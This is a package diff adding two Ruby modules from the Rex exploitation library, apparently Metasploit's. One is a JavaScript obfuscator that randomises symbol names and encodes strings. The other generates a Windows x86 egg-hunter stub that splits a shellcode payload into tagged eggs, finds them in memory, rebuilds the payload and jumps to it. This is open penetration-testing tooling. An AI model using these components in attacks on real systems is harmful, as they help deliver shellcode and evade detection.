librex 0.0.20 → 0.0.21

data/lib/rex/exploitation/obfuscatejs.rb

@@ -0,0 +1,335 @@
+require 'rex/text'
+module Rex
+module Exploitation
+
+#
+# Obfuscates javascript in various ways
+#
+class ObfuscateJS
+	attr_reader :opts
+
+	#
+	# Obfuscates a javascript string.
+	#
+	# Options are 'Symbols', described below, and 'Strings', a boolean
+	# which specifies whether strings within the javascript should be
+	# mucked with (defaults to false).
+	#
+	# The 'Symbols' argument should have the following format:
+	#
+	# {
+	#    'Variables'  => [ 'var1', ... ],
+	#    'Methods'    => [ 'method1', ... ],
+	#    'Namespaces' => [ 'n', ... ],
+	#    'Classes'    => [ { 'Namespace' => 'n', 'Class' => 'y'}, ... ]
+	# }
+	#
+	# Make sure you order your methods, classes, and namespaces by most
+	# specific to least specific to prevent partial substitution.  For
+	# instance, if you have two methods (joe and joeBob), you should place
+	# joeBob before joe because it is more specific and will be globally
+	# replaced before joe is replaced.
+	#
+	# A simple example follows:
+	#
+	# <code>
+	# js = ObfuscateJS.new <<ENDJS
+	#     function say_hi() {
+	#         var foo = "Hello, world";
+	#         document.writeln(foo);
+	#     }
+	# ENDJS
+	# js.obfuscate(
+	#     'Symbols' => {
+	#	       'Variables' => [ 'foo' ],
+	#	       'Methods'   => [ 'say_hi' ]
+	#	  }
+	#     'Strings' => true
+	# )
+	# </code>
+	#
+	# which should generate something like the following:
+	#
+	# <code>
+	# function oJaDYRzFOyJVQCOHk() { var cLprVG = "\x48\x65\x6c\x6c\x6f\x2c\x20\x77\x6f\x72\x6c\x64"; document.writeln(cLprVG); }
+	# </code>
+	#
+	# String obfuscation tries to deal with escaped quotes within strings but
+	# won't catch things like
+	#     "\\"
+	# so be careful.
+	#
+	def self.obfuscate(js, opts = {})
+		ObfuscateJS.new(js).obfuscate(opts)
+	end
+
+	#
+	# Initialize an instance of the obfuscator
+	#
+	def initialize(js = "", opts = {})
+		@js      = js
+		@dynsym  = {}
+		@opts    = {
+			'Symbols' => {
+				'Variables'=>[],
+				'Methods'=>[],
+				'Namespaces'=>[],
+				'Classes'=>[]
+			},
+			'Strings'=>false
+		}
+		@done = false
+		update_opts(opts) if (opts.length > 0)
+	end
+
+	def update_opts(opts)
+		if (opts.nil? or opts.length < 1)
+			return
+		end
+		if (@opts['Symbols'] && opts['Symbols'])
+			['Variables', 'Methods', 'Namespaces', 'Classes'].each { |k|
+				if (@opts['Symbols'][k] && opts['Symbols'][k])
+					opts['Symbols'][k].each { |s|
+						if (not @opts['Symbols'][k].include? s)
+							@opts['Symbols'][k].push(s)
+						end
+					}
+				elsif (opts['Symbols'][k])
+					@opts['Symbols'][k] = opts['Symbols'][k]
+				end
+			}
+		elsif opts['Symbols']
+			@opts['Symbols'] = opts['Symbols']
+		end
+		@opts['Strings'] ||= opts['Strings']
+	end
+
+	#
+	# Returns the dynamic symbol associated with the supplied symbol name
+	#
+	# If obfuscation has not yet been performed (i.e. obfuscate() has not been
+	# called), then this method simply returns its argument
+	#
+	def sym(name)
+		@dynsym[name] || name
+	end
+
+	#
+	# Obfuscates the javascript string passed to the constructor
+	#
+	def obfuscate(opts = {})
+		#return @js if (@done)
+		@done = true
+
+		update_opts(opts)
+
+		if (@opts['Strings'])
+			obfuscate_strings()
+
+			# Full space randomization does not work for javascript -- despite
+			# claims that space is irrelavent, newlines break things.  Instead,
+			# use only space (0x20) and tab (0x09).
+
+			#@js.gsub!(/[\x09\x20]+/) { |s|
+			#	len = rand(50)+2
+			#	set = "\x09\x20"
+			#	buf = ''
+			#	while (buf.length < len)
+			#		buf << set[rand(set.length)].chr
+			#	end
+			#	
+			#	buf
+			#}
+		end
+
+		# Remove our comments
+		remove_comments
+		
+		# Globally replace symbols
+		replace_symbols(@opts['Symbols']) if @opts['Symbols']
+
+		return @js
+	end
+
+	#
+	# Returns the replaced javascript string
+	#
+	def to_s
+		@js
+	end
+	alias :to_str :to_s
+
+	def <<(str)
+		@js << str
+	end
+	def +(str)
+		@js + str
+	end
+
+protected
+	attr_accessor :done
+
+	#
+	# Get rid of both single-line C++ style comments and multiline C style comments.
+	#
+	# Note: embedded comments (e.g.: "/*/**/*/") will break this,
+	# but they also break real javascript engines so I don't care.
+	#
+	def remove_comments
+		@js.gsub!(%r{\s+//.*$}, '')
+		@js.gsub!(%r{/\*.*?\*/}m, '')
+	end
+
+	# Replace method, class, and namespace symbols found in the javascript
+	# string
+	def replace_symbols(symbols)
+		taken = { }
+
+		# Generate random symbol names
+		[ 'Variables', 'Methods', 'Classes', 'Namespaces' ].each { |symtype|
+			next if symbols[symtype].nil?
+			symbols[symtype].each { |sym|
+				dyn = Rex::Text.rand_text_alpha(rand(32)+1) until dyn and not taken.key?(dyn)
+	
+				taken[dyn] = true
+			
+				if symtype == 'Classes'
+					full_sym = sym['Namespace'] + "." + sym['Class']
+					@dynsym[full_sym] = dyn
+
+					@js.gsub!(/#{full_sym}/) { |m|
+						sym['Namespace'] + "." + dyn
+					}
+				else
+					@dynsym[sym] = dyn
+
+					@js.gsub!(/#{sym}/, dyn)
+				end
+			}
+		}
+	end
+
+	#
+	# Change each string into some javascript that will generate that string
+	#
+	# There are a couple of caveats to using string obfuscation:
+	#   * it tries to deal with escaped quotes within strings but won't catch
+	#     things like: "\\"
+	#   * depending on the random choices, this can easily balloon a short
+	#     string up to hundreds of kilobytes if called multiple times.
+	# so be careful.
+	#
+	def obfuscate_strings()
+		@js.gsub!(/".*?[^\\]"|'.*?[^\\]'/) { |str|
+			buf = ''
+			quote = str[0,1]
+			# Pull the quotes off either end
+			str = str[1, str.length-2]
+			case (rand(2))
+			# Disable hex encoding for now.  It's just too big a hassle.
+			#when 0
+			#	# This is where we can run into trouble with generating
+			#	# incorrect code.  If we hex encode a string twice, the second
+			#	# encoding will generate the first instead of the original
+			#	# string.
+			#	if str =~ /\\x/
+			#		# Always have to remove spaces from strings so the space
+			#		# randomization doesn't mess with them.
+			#		buf = quote + str.gsub(/ /, '\x20') + quote
+			#	else
+			#		buf = '"' + Rex::Text.to_hex(str) + '"'
+			#	end
+			when 0
+				#
+				# Escape sequences when naively encoded for unescape become a
+				# literal backslash instead of the intended meaning.  To avoid
+				# that problem, we scan the string for escapes and leave them
+				# unmolested.
+				#
+				buf << 'unescape("'
+				bytes = str.unpack("C*")
+				c = 0
+				while bytes[c]
+					if bytes[c].chr == "\\"
+						# XXX This is pretty slow.
+						esc_len = parse_escape(bytes, c)
+						buf << bytes[c, esc_len].map{|a| a.chr}.join
+						c += esc_len
+						next
+					end
+					buf << "%%%0.2x"%(bytes[c])
+					# Break the string into smaller strings
+					if bytes[c+1] and rand(10) == 0
+						buf << '" + "'
+					end
+					c += 1
+				end
+				buf << '")'
+			when 1
+				buf = "String.fromCharCode( "
+				bytes = str.unpack("C*")
+				c = 0
+				while bytes[c]
+					if bytes[c].chr == "\\"
+						case bytes[c+1].chr
+						# For chars that contain their non-escaped selves, step
+						# past the backslash and let the rand() below decide
+						# how to represent the character.
+						when '"'; c += 1
+						when "'"; c += 1
+						when "\\"; c += 1
+						# For others, just take the hex representation out of
+						# laziness.
+						when "n"; buf << "0x0a"; c += 2; next
+						when "t"; buf << "0x09"; c += 2; next
+						# Lastly, if it's a hex, unicode, or octal escape,
+						# leave it, and anything after it, alone.  At some
+						# point we may want to parse up to the end of the
+						# escapes and encode subsequent non-escape characters.
+						# Since this is the lazy way to do it, spaces after an
+						# escape sequence will get away unmodified.  To prevent
+						# the space randomizer from hosing the string, convert
+						# spaces specifically.
+						else
+							buf = buf[0,buf.length-1] + " )"
+							buf << ' + ("' + bytes[c, bytes.length].map{|a| a==0x20 ? '\x20' : a.chr}.join + '" '
+							break
+						end
+					end
+					case (rand(3))
+					when 0
+						buf << " %i,"%(bytes[c])
+					when 1
+						buf << " 0%o,"%(bytes[c])
+					when 2
+						buf << " 0x%0.2x,"%(bytes[c])
+					end
+					c += 1
+				end
+				# Strip off the last comma
+				buf = buf[0,buf.length-1] + " )"
+			end
+			buf
+		}
+		@js
+	end
+
+	def parse_escape(bytes, offset)
+		esc_len = 0
+		if bytes[offset].chr == "\\"
+			case bytes[offset+1].chr
+			when "u"; esc_len = 6     # unicode \u1234
+			when "x"; esc_len = 4     # hex, \x41
+			when /[0-9]/              # octal, \123, \0
+				oct = bytes[offset+1, 4].map{|a|a.chr}.join
+				oct =~ /([0-9]+)/
+				esc_len = 1 + $1.length
+			else; esc_len = 2         # \" \n, etc.
+			end
+		end
+		esc_len
+	end
+end
+
+end
+end

data/lib/rex/exploitation/omelet.rb

@@ -0,0 +1,320 @@
+require 'rex/text'
+require 'rex/arch'
+require 'metasm'
+
+
+module Rex
+module Exploitation
+
+###
+#
+# This class provides an interface to generating an eggs-to-omelet hunter for win/x86.
+#
+# Written by corelanc0d3r <peter.ve@corelan.be>
+#
+###
+class Omelet
+
+	###
+	#
+	# Windows-based eggs-to-omelet hunters
+	#
+	###
+	module Windows
+		Alias = "win"
+
+		module X86
+			Alias = ARCH_X86
+
+			#
+			# The hunter stub for win/x86.
+			#
+			def hunter_stub
+				{
+					# option hash members go here (currently unused)
+				}
+			end
+
+		end
+	end
+
+	###
+	#
+	# Generic interface
+	#
+	###
+
+	#
+	# Creates a new hunter instance and acquires the sub-class that should
+	# be used for generating the stub based on the supplied platform and
+	# architecture.
+	#
+	def initialize(platform, arch = nil)
+		Omelet.constants.each { |c|
+			mod = self.class.const_get(c)
+
+			next if ((!mod.kind_of?(::Module)) or (!mod.const_defined?('Alias')))
+
+			if (platform =~ /#{mod.const_get('Alias')}/i)
+				self.extend(mod)
+
+				if (arch and mod)
+					mod.constants.each { |a|
+						amod = mod.const_get(a)
+
+						next if ((!amod.kind_of?(::Module)) or
+							(!amod.const_defined?('Alias')))
+
+						if (arch =~ /#{mod.const_get(a).const_get('Alias')}/i)
+								amod = mod.const_get(a)
+
+								self.extend(amod)
+							end
+						}
+					end
+				end
+			}
+		end
+
+		#
+		# This method generates an eggs-to-omelet hunter using the derived hunter stub.
+		#
+		def generate(payload, badchars = '', opts = {})
+
+			eggsize       = opts[:eggsize] || 123
+			eggtag        = opts[:eggtag] || "00w"
+			searchforward = opts[:searchforward] || true
+			reset         = opts[:reset]
+			startreg      = opts[:startreg]
+			usechecksum   = opts[:checksum]
+			adjust        = opts[:adjust] || 0
+
+			return nil if ((opts = hunter_stub) == nil)
+
+			# calculate number of eggs
+			payloadlen = payload.length
+			delta = payloadlen / eggsize
+			delta = delta * eggsize
+			nr_eggs = payloadlen / eggsize
+			if delta < payloadlen
+				nr_eggs = nr_eggs+1
+			end
+
+			nr_eggs_hex = "%02x" % nr_eggs
+			eggsize_hex = "%02x" % eggsize
+
+			hextag = ''
+			eggtag.split('').each do | thischar |
+				decchar = "%02x" % thischar[0]
+				hextag = decchar + hextag
+			end
+			hextag = hextag + "01"
+
+			# search forward or backward ?
+			setflag      = nil
+			searchstub1  = nil
+			searchstub2  = nil
+			flipflagpre  = ''
+			flipflagpost = ''
+			checksum     = ''
+
+			if searchforward
+				# clear direction flag
+				setflag     = "cld"
+				searchstub1 = "dec edx\n\tdec edx\n\tdec edx\n\tdec edx"
+				searchstub2 = "inc edx"
+			else
+				# set the direction flag
+				setflag      = "std"
+				searchstub1  = "inc edx\n\tinc edx\n\tinc edx\n\tinc edx"
+				searchstub2  = "dec edx"
+				flipflagpre  = "cld\n\tsub esi,-8"
+				flipflagpost = "std"
+			end
+
+			# will we have to adjust the destination address ?
+			adjustdest = ''
+			if adjust > 0
+				adjustdest = "\n\tsub edi,#{adjust}"
+			elsif adjust < 0
+				adjustdest = "\n\tadd edi,#{adjust}"
+			end
+
+			# prepare the stub that starts the search
+			startstub = ''
+			if startreg
+				if startreg.downcase != 'ebp'
+					startstub << "mov ebp,#{startreg}"
+				end
+				startstub << "\n\t" if startstub.length > 0
+				startstub << "mov edx,ebp"
+			end
+			# a register will be used as start location for the search
+			startstub << "\n\t" if startstub.length > 0
+			startstub << "push esp\n\tpop edi\n\tor di,0xffff"
+			startstub << adjustdest
+			# edx will be used, start at end of stack frame
+			if not startreg
+				startstub << "\n\tmov edx,edi"
+				if reset
+					startstub << "\n\tpush edx\n\tpop ebp"
+				end
+			end
+
+			# reset start after each egg was found ?
+			# will allow to find eggs when they are out of order/sequence
+			resetstart = ''
+			if reset
+				resetstart = "push ebp\n\tpop edx"
+			end
+
+         		#checksum code by dijital1 & corelanc0d3r
+			if usechecksum
+				checksum = <<EOS
+	xor ecx,ecx
+	xor eax,eax
+calc_chksum_loop:
+	add al,byte [edx+ecx]
+	inc ecx
+	cmp cl, egg_size
+	jnz calc_chksum_loop
+test_chksum:
+	cmp al,byte [edx+ecx]
+	jnz find_egg
+EOS
+			end
+
+			# create omelet code
+			omelet_hunter = <<EOS
+
+	nr_eggs equ 0x#{nr_eggs_hex}	; number of eggs
+	egg_size equ 0x#{eggsize_hex} 	; nr bytes of payload per egg
+	hex_tag equ 0x#{hextag}		; tag
+
+	#{setflag}			; set/clear direction flag
+	jmp start
+
+	; routine to calculate the target location
+	; for writing recombined shellcode (omelet)
+	; I'll use EDI as target location
+	; First, I'll make EDI point to end of stack
+	; and I'll put the number of shellcode eggs in eax
+get_target_loc:
+	#{startstub}		; use edx as start location for the search
+	xor eax,eax		; zero eax
+	mov al,nr_eggs		; put number of eggs in eax
+
+calc_target_loc:
+	xor esi,esi		; use esi as counter to step back
+	mov si,0-(egg_size+20)	; add 20 bytes of extra space, per egg
+
+get_target_loc_loop:	; start loop
+	dec edi		; step back
+	inc esi		; and update ESI counter
+	cmp si,-1	; continue to step back until ESI = -1
+	jnz get_target_loc_loop
+	dec eax		; loop again if we did not take all pieces
+               ; into account yet
+	jnz calc_target_loc
+
+	; edi now contains target location
+	; for recombined shellcode
+	xor ebx,ebx		; put loop counter in ebx
+	mov bl,nr_eggs+1
+	ret
+
+start:
+	call get_target_loc	; jump to routine which will calculate shellcode dst address
+
+	; start looking for eggs, using edx as basepointer
+	jmp search_next_address
+
+find_egg:
+	#{searchstub1}		; based on search direction
+
+search_next_address:
+	#{searchstub2}		; based on search direction
+	push edx		; save edx
+	push 0x02   ; use NtAccessCheckAndAuditAlarm syscall
+	pop eax		; set eax to 0x02
+	int 0x2e
+	cmp al,0x5		; address readable ?
+	pop edx		; restore edx
+	je search_next_address  ; if addressss is not readable, go to next address
+
+	mov eax,hex_tag	; if address is readable, prepare tag in eax
+	add eax,ebx		; add offset (ebx contains egg counter, remember ?)
+	xchg edi,edx		; switch edx/edi
+	scasd			; edi points to the tag ?
+	xchg edi,edx		; switch edx/edi back
+	jnz find_egg		; if tag was not found, go to next address
+	;found the tag at edx
+
+   ;do we need to verify checksum ? (prevents finding corrupted eggs)
+   #{checksum}
+
+copy_egg:
+	; ecx must first be set to egg_size (used by rep instruction) and esi as source
+	mov esi,edx		; set ESI = EDX (needed for rep instruction)
+	xor ecx,ecx
+	mov cl,egg_size	; set copy counter
+	#{flipflagpre}		; flip destination flag if necessary
+	rep movsb		; copy egg from ESI to EDI
+	#{flipflagpost}		; flip destination flag again if necessary
+	dec ebx		; decrement egg
+	#{resetstart}		; reset start location if necessary
+	cmp bl,1		; found all eggs ?
+	jnz find_egg		; no = look for next egg
+	; done - all eggs have been found and copied
+
+done:
+	call get_target_loc	; re-calculate location where recombined shellcode is placed
+	cld
+	jmp edi		; and jump to it :)
+EOS
+
+			the_omelet = Metasm::Shellcode.assemble(Metasm::Ia32.new, omelet_hunter).encode_string
+
+			# create the eggs array
+			total_size = eggsize * nr_eggs
+			padlen = total_size - payloadlen
+			payloadpadding = "A" * padlen
+
+			fullcode = payload + payloadpadding
+			eggcnt = nr_eggs + 2
+			startcode = 0
+
+			eggs = []
+			while eggcnt > 2 do
+				egg_prep = eggcnt.chr + eggtag
+				this_egg = fullcode[startcode, eggsize]
+            if usechecksum
+					cksum = 0
+					this_egg.each_byte { |b|
+						cksum += b
+					}
+					this_egg << [cksum & 0xff].pack('C')
+				end
+
+				this_egg = egg_prep + this_egg
+				eggs << this_egg
+
+				eggcnt -= 1
+				startcode += eggsize
+			end
+
+			return [ the_omelet, eggs ]
+		end
+
+protected
+
+	#
+	# Stub method that is meant to be overridden.  It returns the raw stub that
+	# should be used as the omelet maker (combine the eggs).
+	#
+	def hunter_stub
+	end
+
+end
+end
+end